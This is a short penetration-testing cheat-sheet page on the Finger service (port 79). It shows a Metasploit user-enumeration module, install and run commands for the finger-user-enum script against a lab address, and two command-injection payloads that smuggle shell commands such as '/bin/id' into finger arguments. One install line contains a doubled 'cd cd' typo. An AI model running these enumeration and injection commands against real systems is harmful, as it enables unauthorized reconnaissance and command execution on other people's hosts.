> For the complete documentation index, see [llms.txt](https://docs.h4rithd.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.h4rithd.com/tcp/79-finger.md).

# Finger | 79

* Using msf

```bash
use auxiliary/scanner/finger/finger_users
set RHOSTS 10.10.10.76
run
```

* [finger-user-enum](https://github.com/pentestmonkey/finger-user-enum)

```bash
# Install
git clone https://github.com/pentestmonkey/finger-user-enum.git ; cd cd finger-user-enum ; ls -al    

# Run
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S  
./finger-user-enum.pl -u root -t 10.10.10.76 | less -S  
```

* Command Injection.

```bash
finger "|/bin/id@<IP>"
finger "|/bin/ls -a /<IP>"
```
